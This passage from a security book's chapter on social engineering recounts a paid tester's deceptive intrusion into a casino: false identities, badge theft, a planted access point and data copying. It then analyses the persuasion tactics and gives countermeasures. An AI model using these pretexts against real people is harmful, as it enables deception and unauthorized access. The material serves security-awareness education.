Charlie by his nickname, Cheesy. So I asked Charlie if he caught shit like
that a lot and he told me how he got the nickname.”
  Whurley then headed toward the employee entrance at a quick pace.
It’s often said that the best defense is a good offense, and that was his
plan. As he reached the entrance, where he had noticed employees show-
ing their badges earlier, he went straight up to the guard at the desk and
said, “Hey, have you seen Cheesy? He owes me $20 on the game and I
need the money to get some lunch when I go on break.”
  Recalling that moment, he says, “Damn! This is where I got my first
challenge.” He had forgotten that employees get their meals free. But he
  Chapter 10   Social Engineers — How They Work and How to Stop Them         225

wasn’t put off by being challenged; while others with attention
deficit/hyperactivity disorder (ADHD) might see it as a problem,
Whurley describes himself as “very ADHD,” and adds that, as a result, “I
can think much faster on my feet than 90 percent of the people I run
into.” That ability came in handy here.
      So the guard says, “What the hell are you buying lunch for any-
      way?” and chuckled but started looking suspicious. Quickly I
      threw out, “I’m meeting a little honey for lunch. Man, she’s hot.
      (This always distracts older guys, out of shape guys, and the living-
      with-mom type guys.) “What am I going to do?”
     The guard says, “Well, you’re screwed ’cause Cheesy’s gone for the
     rest of the week.”
     “Bastard!” I say.

  The guard then amused Whurley (an amusement he didn’t dare show)
by unexpectedly asking if he was in love.

     I just start rolling with it. Then I got the surprise of my life. I
     have never even come close to something like this. It could be
     attributed to skill, but I rack it up to blind luck: the guy gives me
     $40! He tells me $20 won’t buy shit and I obviously need to be the
     one that pays. Then he gives me five minutes of “fatherly” advice,
     and all about how he wished he had known what he knows now
     when he was my age.

  Whurley was “in awe” that the guy bought this con and was paying for
his imaginary date.
  But, things weren’t going as smoothly as Whurley thought, because as
he started walking off, the guard realized he hadn’t shown any ID and
challenged him. “So I said, ‘It’s in my bag, sorry about that’ and started
digging through my stuff as I proceeded away from him. That was a close
call ’cause if he’d have insisted on seeing the ID, I might have been
screwed.”
  Whurley was now inside the employee entrance but had no idea where
to go. There weren’t a lot of people he could follow, so he just walked
with confidence and started taking mental notes of his surroundings. He
had little fear of being challenged at this point. “Funny,” he said, “how
the psychology of color can come in so handy. I was wearing blue — the
truth color — and dressed as if I were a junior executive. Most of the
people running around were wearing staffer clothes, so it was highly
unlikely they would question me.”
226                           The Art of Intrusion


  As he was walking down the hallway, he noticed that one of the cam-
era rooms just looked just like the ones he had seen on the Travel
Channel — an “Eye in the Sky” room, except that this one wasn’t over-
head. The outer room had “the most VCRs I had ever seen in one
place — wow, was it cool!” He walked through to the inner room and
then did something especially gutsy. “I just walked in, cleared my throat
and before they could challenge me, I said, ‘Focus on the girl on 23.’”
  All the displays were numbered, and, of course, there was a girl on
nearly every one. The men gathered around display 23 and they all began
talking about what the girl might be up to, which Whurley thought gen-
erated a good deal of paranoia. This went on for some 15 minutes just
checking out people on monitors, with Whurley deciding that the job is
a perfect one for anyone with a propensity for voyeurism.
  As he was getting ready to leave, he announced, “Oh, I got so caught
up in that action, I forgot to introduce myself. I’m Walter with Internal
Audit. I just got hired onto Dan Moore’s staff,” using the name of the
head of Internal Audit that he had picked up in one of his conversations.
“And I’ve never been to this property so I’m a little lost. Could you point
me in the direction of the executive offices?”
  The guys were more than happy to get rid of an interfering executive
and eager to help “Walter” find the offices he was looking for. Whurley
set out in the direction they indicated. Seeing nobody in sight, he
decided to take a look around and found a small break room where a
young woman was reading a magazine. “She was Megan, a real nice girl.
So Megan and I talked for a few minutes. Then she says, ‘Oh, if you’re
with Internal Audit, I have some stuff that needs to go to back there.’”
As it turned out, Megan had a couple of badges, some internal memos,
and a box of papers that belonged back at the main resort group Internal
Audit office. Whurley thought, “Wow, now I have a badge!”
  Not that people look at the pictures on ID badges very carefully, but
he took the precaution of flipping it around so only the back was visible.

      As I’m walking out, I see an open, empty office. It has two net-
      work ports, but I can’t tell if they’re hot by just looking at them,
      so I go back to where Megan is sitting and tell her that I forgot I
      was supposed to look at her system and the one in “the boss’s
      office.” She graciously agrees and lets me sit at her desk.
      She gives me her password when I ask, and then has to use the rest-
      room. So, I tell her I’m going to add a “network security moni-
      tor” and show her the wireless access point. She replies, “Whatever.
      I don’t really know much about that geeky stuff.”
  Chapter 10   Social Engineers — How They Work and How to Stop Them       227

   While she was out, he installed the wireless access point and restarted
her desktop. Then he realized he had a 256MB universal serial bus (USB)
flash drive on his key chain and full access to Megan’s computer. “I start
surfing through her hard drive and find all kind of good stuff.” It turned
out that she was the executive administrator for every one of the execu-
tives and that she had organized their files by name “all nice and neat.”
He grabbed everything he could, then, using the timer feature on his dig-
ital camera, took a picture of himself sitting in the main executive’s office.
After a few minutes Megan returned, and he asked her for directions to
the Network Operations Center (NOC).
   There he ran into “serious trouble.” He said, “First off, the network
room was marked . . . which was cool. However, the door is locked.” He
didn’t have a badge that would give him access and tried knocking.

     A gentleman comes to the door and I tell him the same story I’ve
     been using: “Hi, I’m Walter with Internal Audit and blah, blah,
     blah.” Except what I don’t know is that this guy’s boss — the IT
     director — is sitting in the office. So the guy at the door says
     “Well, I need to check with Richard. Wait here a second.”
     He turns around and tells another guy to get Richard and let
     him know that there is someone “claiming” to be from Internal
     Audit at the door. A few moments later, I get busted. Richard
     asks who I’m with, where my badge is, and a half dozen other
     questions in rapid succession. He then says, “Why don’t you come
     into my office while I call Internal Audit and we’ll get this
     cleared up.”

   Whurley figured that “This guy has totally busted me.” But then,
“Thinking quickly, I tell him ‘You got me!’ and I shake his hand. I then tell
him ‘My name is Whurley.’ And I reach in my bag for a business card. I then
tell him that I’ve been down inside the bowels of the casino for a couple of
hours and not one person has challenged me, and that he was the first and
was probably going to look pretty good in my report. I then say, ‘Let’s go
sit in your office while you call over so you know everything is legitimate.
Besides,’ I say, ‘I need to go ahead and tell Martha, who is in charge of this
operation, about a couple of the things I’ve seen down here.’”
   For an on-the-spot gambit in a tight situation, it turned out to be brilliant.
An amazing transformation took place. Richard began asking Whurley
about what he had seen, people’s names, and so on, and then explained
that he had been doing his own audit in an attempt to get an increase in
the security budget to make the NOC more secure, with “biometrics and
228                          The Art of Intrusion


the whole works.” And he suggested that maybe he could use some of
Whurley’s information to help him achieve his goal.
   By then it was lunch time. Whurley took advantage of the opening by
suggesting that maybe they could talk about it over lunch, which Richard
seemed to think was a good idea, and they headed off together to the
staff cafeteria. “Notice that we haven’t called anyone yet at this point. So
I suggest that we place that call, and he says, ‘You’ve got a card, I know
who you are.’” So the two ate together in the cafeteria, where Whurley
got a free meal and made a new “friend.”
   “He asked about my networking background and we started talking
about the AS400s that the casino is running everything on. The fact that
things went this way can be described in two words — very scary.” Scary
because the man is the director of IT, and responsible for computer secu-
rity, is sharing all kinds of privileged, inside information with Whurley but
has never taken the most basic step of verifying his identity.
   Commenting on this, Whurley observed that “mid-level managers
don’t ever want to be put ‘on the spot.’ Like most of us, they never want
to be wrong or get caught making an obvious mistake. Understanding
their mindset can be a huge advantage.” After lunch, Richard brought
Whurley back to the NOC.
   “When we walk in, he introduces me to Larry, the main systems admin-
istrator for the AS400s. He explains to Larry that I’m going to be ‘rip-
ping’ them in an audit in a few days, and he had had lunch with me and
got me to agree to do a preliminary audit and save them any major
embarrassment” when it came time for the actual audit. Whurley then
spent a few minutes getting an overview of the systems from Larry, gath-
ering more useful information for his report; for example, that the NOC
stored and processed all of the aggregate data for the entire resort group.

      I told him that it would help me to help him faster if I had a net-
      work diagram, firewall Access Control Lists, and so on, which he
      provided only after calling Richard for approval. I thought,
      “Good for him.”

  Whurley suddenly realized that he had left the wireless access point
back in the executive offices. Though the chances that he would be
caught had dropped dramatically since establishing his rapport with
Richard, he explained to Larry that he needed to go back to get the
access point he had left. “To do this I would need a badge so I could let
myself back into the NOC and come and go as I pleased.” Larry seemed
a bit reluctant to do this, so Whurley recommended that he call Richard
  Chapter 10   Social Engineers — How They Work and How to Stop Them    229

again. He called and told Richard that the visitor wanted to be issued a
badge; Richard had an even better idea: The casino had recently let sev-
eral employees go, and their badges were in the NOC and nobody had
found the time yet to deactivate them, “so it would be all right for him
to just use one of those.”
   Whurley went back to having Larry explain the systems and describe
the security measures they had recently taken. A phone call came in from
Larry’s wife, apparently angry and upset about some ongoing issue.
Whurley pounced on this volatile situation, recognizing he could bene-
fit. Larry said to his wife, “Listen, I can’t talk. I have someone here in the
office.” Whurley motioned for Larry to put his wife on hold for a second
and then offered advice about how important it was for him to work
through the problem with her. And he offered to grab one of the badges
if Larry would show him where they were.
   “So Larry walked me over to a filing cabinet, opened a drawer, and just
said ‘Take one of these.’ He then walked back to his desk and picked up
the phone. I noticed that there was no sign-out sheet or log of the badge
numbers, so I took two of the several that were there.” He now had not
just a badge, but one that would allow him access to the NOC at any time.
   Whurley then headed back to see his new friend Megan, recover his
wireless access point, and see what else he could find out. And he could
take his time about it.

     I figured the time wouldn’t really matter because he’d be on the
     phone with his wife and he’d stay distracted for longer than he
     thought. I set the stopwatch on my phone to count down twenty
     minutes, enough time for me to do some exploring without draw-
     ing additional suspicion from Larry, who appeared to suspect
     something was up.

   Anyone who’s ever worked in an IT department knows that ID badges
are tied to a computer system; with the right PC access, you can expand
your access to go anywhere in the building. Whurley was hoping to dis-
cover the computer where badge access privileges were controlled so he
could modify the access on the two badges he had. He walked through
the corridors looking into offices for the control system for the badges,
which proved to be harder than he thought. He felt frustrated and
stumped.
   He decided to ask someone and settled on the guard who had been so
friendly at the employees’ entrance. By now many people had seen him
with Richard, so that suspicions were almost nonexistent. Whurley found
230                           The Art of Intrusion


his mark and told him that he needed to see the building access control
system. The guard didn’t even ask why. No trouble. He was told exactly
where to find what he was looking for.
  “I located the control system and walked into the small networking
closet where it was located. There I found a PC on the floor with the list
for the ID badges already open. No screen saver, no password — noth-
ing to slow me down.” In his view, this was typical. “People have an ‘out
of sight, out of mind’ mentality. If a system like this is in a controlled
access area, they think there isn’t any need to be diligent about protecting
the computer.”
  In addition to giving himself all-areas access, there was one more thing
he wanted to do:

      Just for fun, I thought I should take the extra badge, add some
      access privileges, switch the name, and then switch it with an
      employee who would be wandering around the casino, inadver-
      tently helping me to muddy the audit logs. But who would I
      choose? Why Megan, of course — it would be easy to switch the
      badges with her. All I would have to do is tell her I needed her help
      with the audit.

  When Whurley walked in, Megan was as friendly as ever. He explained
that he had completed the test and needed to get that equipment back.
He then told Megan that he needed her help. “Most social engineers
would agree that people are too willing to help.” He needed to see
Megan’s badge to check it against the list he had. A few moments later,
Megan had a badge that would confuse things even further, while
Whurley had her badge as well as the badge that would tag him as an
executive in the logs.
  When Whurley got back to Larry’s office, the distraught manager was
just finishing the call with his wife. Finally hanging up, he was ready to
continue their conversation. Whurley asked that the network diagrams be
explained in detail to him, but then interrupted and, to disarm him,
Whurley asked about how things were going with Larry’s wife. The two
men spent almost an hour talking about marriage and other life issues.

      At the end of our talk, I was convinced that Larry wouldn’t be
      causing me any more issues. So, now I explain to Larry that my
      laptop has special auditing software I need to run against the
      network. Since I usually have top gear, getting the laptop hooked
      up to the network is always easy because there isn’t a geek on the
      planet who doesn’t want to see it running.
  Chapter 10   Social Engineers — How They Work and How to Stop Them            231

  After a while, Larry stepped away to make some phone calls and attend
to other items. Left to himself, Whurley scanned the network and was
able to compromise several systems, both Windows and Linux machines,
because of poor password management, and then spent nearly two hours
starting and stopping copies of information off the network and even
burning some of the items to DVD, “which was never questioned.”

     After completing all of this I thought it would be funny, and use-
     ful, to try one more thing. I went to every individual that I had
     come in contact with — and some that had just briefly seen me
     with others — and told them some variant of “Well, I’m done.
     Say, could you do me a favor. I like to collect pictures of all the peo-
     ple and places I work at. Would you mind taking a picture with
     me?” This proved to be “amazingly simple.”

Several people even offered to take the pictures of him with others in
nearby offices. He had also secured badges, network diagrams, and access
to the casino’s network. And he had photos to prove it all.
  At the review meeting, the head of Internal Audit complained that
Whurley had no right to try to access the systems in a physical way
because “that wasn’t how they would be attacked.” Whurley was also
told that what he did bordered on “criminal” and that the client didn’t
at all appreciate his actions.
  Whurley explained:

     Why did the casino think that what I did was unfair? The answer
     was simple. I had not worked with any casino before and did not
     fully understand the regulations [they operate under]. My report
     could cause them to be audited by the Gaming Commission,
     which could potentially have actual financial repercussions.

  Whurley was paid in full, so he didn’t mind very much. He wished that
he had left a better impression on the client but felt they pretty much
hated the approach he had used and thought it unfair to them and to
their employees. “They made it very clear that they didn’t really want to
see me around anymore.”
  That hadn’t happened to him before; usually clients appreciated the
results of his audits and saw them as what he called “mini-red teaming
events or War Games,” meaning they were okay with being tested using the
same methods that a hostile hacker or social engineer might. “Clients
almost always get a thrill out of it. I had, too, until this point in my career.”
232                          The Art of Intrusion


  All in all, Whurley rates this Vegas experience as a success in the area of
testing, but a disaster in the area of client relations. “I’ll probably never
work in Vegas again,” he laments.
  But then, maybe the Gaming Commission needs the consulting serv-
ices of an ethical hacker who already knows his way around the back areas
of a casino.


INSIGHT
Social psychologist Brad Sagarin, PhD, who has made a study of persua-
sion, describes the social engineer’s arsenal this way: “There’s nothing
magic about social engineering. The social engineer employs the same
persuasive techniques the rest of us use every day. We take on roles. We
try to build credibility. We call in reciprocal obligations. But unlike most
of us, the social engineer applies these techniques in a manipulative,
deceptive, highly unethical manner, often to devastating effect.”
  We asked Dr. Sagarin to provide descriptions of the psychological
principles underlying the most common tactics used by social engi-
neers. In a number of cases, he accompanied his explanation with an
example from the stories in the earlier Mitnick/Simon book, The Art
of Deception (Wiley Publishing, Inc., 2002), that illustrated the partic-
ular tactic.
  Each item begins with an informal, nonscientific explanation of the
principle, and an example.


Trappings of Role
The social engineer exhibits a few behavioral characteristics of the role he
or she is masquerading in. Most of us tend to fill in the blanks when given
just a few characteristics of a role — we see a man dressed like an execu-
tive and assume he’s smart, focused, and reliable.
  Example: When Whurley entered the Eye in the Sky room, he was dressed
like an executive, he spoke with a commanding authority, and he gave what
the men in the room took to be an order to action. He had successfully
donned the trappings of a casino manager or executive.
  In virtually every social engineering attack, the attacker uses trappings of
role so the target will infer other characteristics of the role and act accord-
ingly. The role may be as an IT technician, a customer, a new hire, or any
of many others that would ordinarily encourage compliance with a request.
Common trappings include mentioning the name of the target’s boss or
  Chapter 10   Social Engineers — How They Work and How to Stop Them   233

other employees, or using company or industry terminology or jargon. For
in-person attacks, the attackers choice of clothing, jewelry (a company pin,
an athlete’s wristwatch, an expensive pen, a school ring), or grooming (for
example, hairstyle) are also trappings that can suggest believability in the
role that the attacker is claiming. The power of this method grows from the
fact that once we accept someone (as an executive, a customer, a fellow
employee), we make inferences attributing other characteristics (an execu-
tive is wealthy and powerful, a software developer is technically savvy but
may be socially awkward, a fellow employee is trustworthy).
   How much information is needed before people start making these
inferences? Not much.


Credibility
Establishing credibility is step one in most social engineering attacks, a
cornerstone for everything that is to follow.
  Example: Whurley suggested to Richard, a senior IT person, that the two
of them have lunch together, realizing that his being seen with Richard
would immediately establish his credibility with any employee who noticed
them together.
  Dr. Sagarin identified three methods used in The Art of Deception that
social engineers rely on to build credibility. In one method, the attacker
says something that would seem to be arguing against his or her self-
interest, as found in Chapter 8 of The Art of Deception in the story “One
Simple Call,” when the attacker tells his victim, “Now, go ahead and type
your password but don’t tell me what it is. You should never tell anybody
your password, not even tech support.” This sounds like a statement
from someone who is trustworthy.
  In the second method, the attacker warns the target of an event that
(unbeknownst to the target) the attacker causes to occur. For example, in
the story, “The Network Outage,” appearing in Chapter 5 of The Art of
Deception, the attacker explains that the network connection might go
down. The attacker then does something that makes the victim lose his net-
work connection, giving the attacker credibility in the eyes of the victim.
  This prediction tactic is often combined with the third of these meth-
ods, in which the attacker further “proves” he or she is credible by help-
ing the victim solve a problem. That’s what happened in “The Network
Outage,” when the attacker first warned that the network might go out,
then caused the victim’s network connection to fail, as predicted, and
subsequently restored the connection and claimed that he had “fixed the
problem,” leaving his victim both trusting and grateful.
234                          The Art of Intrusion


Forcing the Target into a Role (Altercasting)
The social engineer maneuvers his or her target into an alternative role,
such as forcing submission by being aggressive.
  Example: Whurley, in his conversations with Lenore, put himself into a
needy role (just broke up with his girlfriend, just moved to town and needs
a job), in order to maneuver her into a helper role.
  In its most common form, the social engineer puts his or her target into
the role of helper. Once a person has accepted the helper role, he or she
will usually find it awkward or difficult to back off from helping.
  An astute social engineer will try to gain a sense of a role that the vic-
tim would be comfortable in. The social engineer will then manipulate
the conversation to maneuver the person into that role — as Whurley did
with both Lenore and Megan when he sensed they would be comfortable
as helpers. People are likely to accept roles that are positive and that make
them feel good.


Distracting from Systematic Thinking
Social psychologists have determined that human beings process incom-
ing information in one of two modes, which they have labeled the sys-
tematic and the heuristic.
  Example: When a manager needed to handle a difficult situation with his
distraught wife, Whurley took advantage of the man’s emotional state and
distraction to make a request that landed him an authentic employee’s
badge.
  Dr. Sagarin explains, “When processing systematically, we think care-
fully and rationally about a request before making a decision. When pro-
cessing heuristically, on the other hand, we take mental shortcuts in
making decisions. For example, we might comply with a request based on
who the requestor claims to be, rather than the sensitivity of the infor-
mation he or she has requested. We try to operate in the systematic mode
when the subject matter is important to us. But time pressure, distrac-
tion, or strong emotion can switch us to the heuristic mode.”
  We like to think that we normally operate in a rational, logical mode,
making decisions based on the facts. Psychologist Dr. Gregory Neidert
has been quoted as saying, “we humans are running our brains at idle
about 90 percent to 95 percent of the time.”1 Social engineers try to take
advantage of this, using a variety of influence methods to force their
victims to shift out of the systematic mode — knowing that people oper-
ating in a heuristic mode are much less likely to have access to their
  Chapter 10   Social Engineers — How They Work and How to Stop Them     235

psychological defenses; they are less likely to be suspicious, ask questions,
or present objections to the attacker.
  Social engineers want to approach targets that are in heuristic mode
and keep them there. One tactic is to call a target five minutes before the
end of the workday, counting on the fact that anxiety about leaving the
office on time may lead the target to comply with a request that might
otherwise have been challenged.


Momentum of Compliance
Social engineers create a momentum of compliance by making a series of
requests, starting with innocuous ones.
  Example: Dr. Sagarin cites the story “CreditChex,” appearing in Chapter
1 of The Art of Deception, in which the attacker buries the key question,
sensitive information about the bank’s Merchant ID number, which was
used as a password to verify identity over the phone, in the middle of a series
of innocuous questions. Since the initial questions appear to be innocuous,
this establishes a framework in which the victim is positioned to treat the
more sensitive information as also innocuous.
  Television writer/producer Richard Levinson made this a tactic of his
most famous character, Columbo, played by Peter Falk. Audiences
delighted in knowing that just as the detective was walking away, and the
suspect was lowering his or her defenses, pleased with themselves at fool-
ing the detective, Columbo would stop to ask one final question, the key
question that he had been building up to all along. Social engineers fre-
quently make use of this “one-more-thing” tactic.


The Desire to Help
Psychologists have identified many benefits people receive when they
help others. Helping can make us feel empowered. It can get us out of a
bad mood. It can make us feel good about ourselves. Social engineers
find many ways of taking advantage of our inclination to be helpful.
  Example: When Whurley showed up at the employees’ entrance of the
casino, the guard believed his story about taking a “honey” to lunch, loaned
him money for the date, gave him advice about how to handle a woman,
and didn’t become insistent when Whurley walked away without ever hav-
ing shown an employee’s ID badge.
  Dr. Sagarin comments, “Because social engineers often target people
who don’t know the value of the information they are giving away, the
help may be seen as carrying little cost to the helper. (How much work
236                           The Art of Intrusion


is it to do a quick database query for the poor slob on the other end of
the telephone?)”


Attribution
Attribution refers to the way people explain their own behavior and that
of others. A goal of the social engineer is to have the target attribute cer-
tain characteristics to him or her, such as expertise, trustworthiness, cred-
ibility, or likability.
  Example: Dr. Sagarin cites the story, “The Promotion Seeker,” appearing
in Chapter 10 of The Art of Deception. The attacker hangs around for a
while before requesting access to a conference room, allaying suspicion
because people assume an intruder wouldn’t dare spend time unnecessarily
in a place where he or she might be caught.
  A social engineer might walk up to a lobby receptionist, put a $5 bill
down on the counter, and say something like, “I found this on the floor.
Did anyone say they lost some money?” The receptionist would attribute
to the social engineer the qualities of honesty and trustworthiness.
  If we see a man hold a door open for an elderly lady, we think he’s
being polite; if the woman is young and attractive, we likely attribute a
quite different motive.


Liking
Social engineers frequently take advantage of the fact that all of us are
more likely to say “yes” to requests from people we like.
  Example: Whurley was able to get useful information from Lenore, the
girl he met at the fitness center, in part by using “cold reading” to gauge her
reactions and continually tailor his remarks to things she would respond to.
This led her to feel that they shared similar tastes and interests (“Me, too!”).
Her sense of liking him made her more open to sharing the information he
wanted to get from her.
  People like those who are like us, such as having similar career interests,
educational background, and personal hobbies. The social engineer will
frequently research his target’s background and equip himself to feign an
interest in things the target cares about — sailing or tennis, antique air-
planes, collecting old guns, or whatever. Social engineers can also
increase liking through the use of compliments and flattery, and physi-
cally attractive social engineers can capitalize on their attractiveness to
increase liking.
  Chapter 10   Social Engineers — How They Work and How to Stop Them     237

  Another tactic is the use of name-dropping of people that the target
knows and likes. In this, the attacker is trying to be seen as part of the
“in group” within the organization. Hackers also use flattery or compli-
ments to stroke the ego of the victim, or target people within the organ-
ization who have recently been rewarded for some accomplishment. Ego
stroking may nudge the unsuspecting victim into the role of a helper.


Fear
A social engineer will sometimes make his or her target believe that some
terrible thing is about to happen, but that the impending disaster can be
averted if the target does as the attacker suggests. In this way, the attacker
uses fear as a weapon.
  Example: In the story, “The Emergency Patch,” appearing in Chapter 12
of The Art of Deception, the social engineer scares his victim with the
threat that the victim will lose valuable data unless the victim agrees to have
an emergency “patch” installed on the company’s database server. The fear
makes the victim vulnerable to the social engineer’s “solution.”
  Status-based attacks frequently rely on fear. A social engineer mas-
querading as a company executive may target a secretary or junior staffer
with an “urgent” demand, and with the implication that the underling
will get into trouble, or might even get fired, for not complying.


Reactance
Psychological reactance is the negative reaction we experience when we
perceive that our choices or freedoms are being taken away. When in the
throes of reactance, we lose our sense of perspective as our desire for the
thing we have lost eclipses all else.
  Example: Two stories in The Art of Deception illustrate the power of
reactance — one based on threats concerning the loss of access to informa-
tion, the other on the loss of access to computing resources.
  In a typical attack based on reactance, the attacker tells his target that
access to computer files won’t be available for a time, and names a time
period that would be completely unacceptable. “You’re not going to be
able to access your files for the next two weeks, but we’ll do everything
possible to make sure it won’t be any longer than that.” When the victim
becomes emotional, the attacker offers to help restore the files quicker;
all that’s needed is the target’s username and password. The target,
relieved at a way to avoid the threatened loss, will usually comply gladly.
238                         The Art of Intrusion


  The other side of the coin involves using the scarcity principle to coerce
the target into pursuing a promised gain. In one version, victims are
drawn to a Web site where their sign-on information or their credit card
information can be stolen. How would you react to an email that prom-
ised a brand-new Apple iPod for $200 to the first 1,000 visitors to a par-
ticular Web site? Would you go to the site and register to buy one? And
when you register with your email address and choose a password, will
you use choose the same password that you use elsewhere?


COUNTERMEASURES
Mitigating social engineering attacks requires a series of coordinated
efforts, including the following:

      ●    Developing clear, concise security protocols that are enforced
           consistently throughout the organization
      ●    Developing security awareness training
      ●    Developing simple rules defining what information is sensitive
      ●    Developing a simple rule that says that whenever a requestor
           is asking for a restricted action (that is, an action that involves
           interaction with computer-related equipment where the con-
           sequences are not known), the requestor’s identity must be
           verified according to company policy
      ●    Developing a data classification policy
      ●    Training employees on ways to resist social engineering
           attacks
      ●    Testing your employee’s susceptibility to social engineering
           attacks by conducting a security assessment

  The most important aspect of the program calls for establishing appro-
priate security protocols and then motivating employees to adhere to the
protocols. The next section outlines some basic points to consider when
designing programs and training to counter the social engineering threat.


Guidelines for Training
Following are some guidelines for training:

      ●    Raise awareness that social engineers will almost certainly
           attack their company at some point, perhaps repeatedly.
Chapter 10   Social Engineers — How They Work and How to Stop Them        239

         There may be a lack of general awareness that social engineers
         constitute a substantial threat; many are not even aware that
         the threat exists. People generally don’t expect to be manipu-
         lated and deceived, so they get caught off guard by a social
         engineering attack. Many Internet users have received an
         email purportedly from Nigeria that requests help in moving
         a substantial amount of money to the States; they offer a per-
         centage of the gross for this kind assistance. Later, you’re
         requested to advance some fees to initiate the transfer process,
         only to be left holding the bag. One lady in New York recently
         fell for the scam and “borrowed” hundreds of thousands of
         dollars from her employer to advance the fees. Rather than
         spending time on her new yet-to-be-purchased yacht, she is
         facing the prospect of sharing a bunk bed in a federal deten-
         tion facility. People really do fall for these social engineering
         attacks; otherwise, the Nigerian scammers would stop sending
         the emails.
    ●    Use role-playing to demonstrate personal vulnerability to social
         engineering techniques, and to train employees in methods to
         resist them.
         Most people operate under the illusion of invulnerability,
         imagining they’re too smart to be manipulated, conned,
         deceived, or influenced. They believe that these things only
         happen to “stupid” people. Two methods are available to help
         employees understand their vulnerability and make them true
         believers. One method involves demonstrating the effective-
         ness of social engineering by “burning” some employees prior
         to their participation in a security awareness seminar, and then
         having them relate their experiences in class. Another
         approach is to demonstrate vulnerability by analyzing actual
         social engineering case studies to illustrate how people are
         susceptible to these attacks. In either case, the training should
         examine the mechanism of the attack, analyzing why it
         worked, and then discussing how such attacks can be recog-
         nized and resisted.
    ●    Aim to establish a sense in the trainees that they will feel foolish if
         manipulated by a social engineering attack after the training.
         Training should emphasize each employee’s responsibility to
         help protect sensitive corporate assets. In addition, it’s vital
         that the designers of the training recognize that the motiva-
         tion to follow security protocols in certain situations only
240                        The Art of Intrusion


          grows out of an understanding of why the protocols are nec-
          essary. During security-awareness training, the instructors
          should give examples of how the security protocol protects
          the business, and the harm that could befall the company if
          people ignore them or are negligent.
          It’s also useful to emphasize that a successful social engineering
          attack may jeopardize the personal information of the employee
          and his or her friends and associates in the company. A com-
          pany’s human resources database may contain personal infor-
          mation that would be extremely valuable to identity thieves.
          But the best motivating factor may be that no one likes to be
          manipulated, deceived, or conned. As such, people are highly
          motivated not to feel foolish or stupid by falling for some
          scam.


Programs for Countering Social Engineering
Following are some basic points to consider when designing programs:

      ●   Develop procedures for employee actions when a social engineer-
          ing attack is recognized or suspect.
          The reader is referred to the extensive handbook of security
          policies provided in The Art of Deception. These polices should
          be considered as a reference; take what you need and leave the
          rest. Once the company’s procedures have been developed and
          put into use, the information should be posted on the com-
          pany’s intranet, where it is quickly available. Another excellent
          resource is Charles Cresson Wood’s treatise on developing
          information security policies, Information Security Policies
          Made Easy (San Jose, CA: Baseline Software, 2001).
      ●   Develop simple guidelines for employees, defining what infor-
          mation the company considers sensitive.
          Since we process information in heuristic mode much of the
          time, simple security rules can be designed to raise a red flag
          when requests are made involving sensitive information (such
          as confidential business information like an individual’s pass-
          word). Once an employee recognizes that sensitive informa-
          tion or some computer action has been requested, he or she
          can refer to the security policy handbook on the company
          intranet Web page to determine the correct protocol or pro-
          cedures to follow.
Chapter 10   Social Engineers — How They Work and How to Stop Them   241

         In addition, it’s important to understand and to convey to
         employees that even information not considered as sensitive
         may be useful to a social engineer, who can collect nuggets of
         seemingly useless information that can be joined to provide
         information for creating the illusion of credibility and trust-
         worthiness. The name of the project manager on a sensitive
         company project, the physical location of a team of develop-
         ers, the name of the server that a particular employee uses,
         and the project name assigned to a secret project are all sig-
         nificant, and each company needs to weigh the needs of the
         business against the possible threat to security.
         These are just a few of the many examples of seemingly unim-
         portant information that can be of use to an attacker.
         Scenarios such as those in The Art of Deception can be useful
         in conveying this notion to trainees.
    ●    Modify organization politeness norms — It’s okay to say “no”!
         Most of us feel awkward or uncomfortable saying “no” to oth-
         ers. (A product now on the market is designed for people who
         are too polite to hang up on telemarketers. When a telemar-
         keter calls, the user presses the * key and hangs up; a voice then
         says to the caller, “Pardon me, this is the Phone Butler and I
         have been directed to inform you that this household must
         regretfully decline your inquiry.” I love the “regretfully.” But
         I think it an interesting commentary that so many people
         need to buy an electronic device to say “no” for them. Would
         you pay $50 for a device that saves you the “embarrassment”
         of saying “no”?)
         The company’s social engineering training program should
         have as one of its goals the redefining of the politeness norm
         at the company. This new behavior would include politely
         declining sensitive requests until the identity and authoriza-
         tion of the requestor can be verified. For example, the train-
         ing might include suggesting responses on the order of, “As
         employees of Company X, we both know how important it is
         to follow security protocols. So, we both understand that I’m
         going to have to verify your identity before complying with
         your request.”
    ●    Developing procedures to verify identity and authorization.
         Each business must develop a process to verify identity and
         authorization of people requesting information or actions
         from employees. The verification process in any situation will
242                         The Art of Intrusion


           necessarily depend on the sensitivity of the information or
           action being requested. As with many other issues in the
           workplace, the security needs must be balanced against the
           business needs of the organization.
           This training needs to address not just the obvious techniques
           but subtle ones as well, such as the use of a business card by
           Whurley to establish his credentials. (Recall the title character
           played by James Garner in the 1970s detective series The
           Rockford Files, who kept a small printing press in his car so he
           could print up an appropriate business card for any occasion.)
           We provided a suggestion for the verification procedure in
           The Art of Deception.2
      ●    Get top management buy-in.
           This is, of course, almost a cliché: Every significant manage-
           ment effort starts with the awareness that the program will
           need management support to succeed. Perhaps there are few
           corporate efforts in which this support is more important than
           security, which daily grows more vital, yet which does little to
           further corporate revenues and so often takes a back seat.
           Yet, that fact only makes it all the more important that a com-
           mitment to security start from the top.
           On a related note, top management should also send two
           clear messages on this subject. Employees will never be asked
           by management to circumvent any security protocol. And no
           employee will get into trouble for following security proto-
           cols, even if directed by a manager to violate them.


On a Lighter Note: Meet the Manipulators
in Your Own Family — Your Children
Many children (or is it most?) have an amazing degree of manipulative
skill — much like the skill used by social engineers — which in most cases
they lose as they grow up and become more socialized. Every parent has
been the target of a child’s attack. When a youngster wants something
badly enough, he or she can be relentless to a degree that at the same
time is highly annoying, but also funny.
  As Bill Simon and I were finishing this book, I was witness to a child’s
full-bore social engineering attack. My girlfriend Darci and her nine-year-
old daughter Briannah had joined me in Dallas while I was there on busi-
ness. At the hotel on the last day before catching an evening flight,
  Chapter 10   Social Engineers — How They Work and How to Stop Them   243

Briannah tested her mother’s patience by demanding they go to a restau-
rant she had chosen for dinner, and threw a typically childish temper
tantrum. Darci applied the mild punishment of temporarily taking away her
Gameboy and telling her she could not use her computer games for a day.
  Briannah put up with this for a while, then, little by little, began trying
different ways of convincing her mother to let her have her games back,
and was still at it when I returned and joined them. The child’s constant
nagging was annoying; then we realized she was trying to social engineer
us and started taking notes:

      ●    “I’m bored. Can I please have my games back.” (Spoken as a
           demand, not as a question.)
      ●    “I’ll drive you crazy unless I can play my games.”
           (Accompanied by a whine.)
      ●    “I won’t have anything to do on the plane without my games.”
           (Spoken in a tone of “Any idiot would understand this.”)
      ●    “It would be okay if I played just one game, wouldn’t it!?” (A
           promise disguised as a question.)
      ●    “I’ll be good if you give me my game back.” (The depths of
